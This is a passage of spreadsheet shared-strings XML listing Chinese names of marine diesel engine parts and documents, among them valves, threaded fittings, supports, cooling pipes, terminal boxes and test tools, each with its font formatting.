        <charset val="134"/>
      </rPr>
      <t>直管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两段式钢圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢带</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝网</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝棉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一步杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加强版</t>
    </r>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限位衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>档板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>塞子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通穿壁接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通旋塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通内螺纹接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通外螺纹接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通伐</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>斯特劳勃接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹套管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双螺纹接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺柱固定器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双头螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴起吊螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺柱（公制螺纹）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函排放清洗系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调料函，半部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管安装说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸气箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸气阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种链条和链节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出端管路</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助信号设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附加材料说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补充材料说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元装配件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元供油系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油供给管支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>升降工具支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护管座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下平台支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架外观图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带油斗支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑框架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套支撑环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表面保护规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表面检查规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆表面处理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下平台上吊梁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水冷却管路</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水冷却管</t>
    </r>
  </si>
  <si>
    <r>
      <t>SW-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下载包</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>行程开关</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>110-… V</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋转接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>虹吸管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>丝锥</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单耳止动垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测速系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥测转速表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗罐</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挺杆座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洗管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器数据</t>
    </r>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>聚四氟乙烯带</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伸缩管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>样板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞顶样板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上紧装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>张紧销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上紧螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>张紧套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉紧弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>张紧垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>碟形垫圆座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>张紧装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端子</t>
    </r>
  </si>
  <si>
    <r>
      <t>E10</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱</t>
    </r>
  </si>
  <si>
    <r>
      <t>E10</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆和插头接线箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆和插头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警接线箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端子板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀测试工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动泵试验装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过压测试</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检验规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>量棒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器试验装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器试验工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试及</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>充注设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>实验规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放残管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动滤器集油盘残油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计护管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒温器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公制螺纹套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹喷嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹紧固件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通旋塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
